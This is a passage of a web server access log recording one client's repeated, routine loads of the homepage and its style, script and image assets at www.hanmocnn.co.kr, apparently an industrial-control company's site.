192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:06:13 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10486] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10486] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:09:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10493] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:13 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:10:13 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1865] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:15:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:16:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:13:19:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 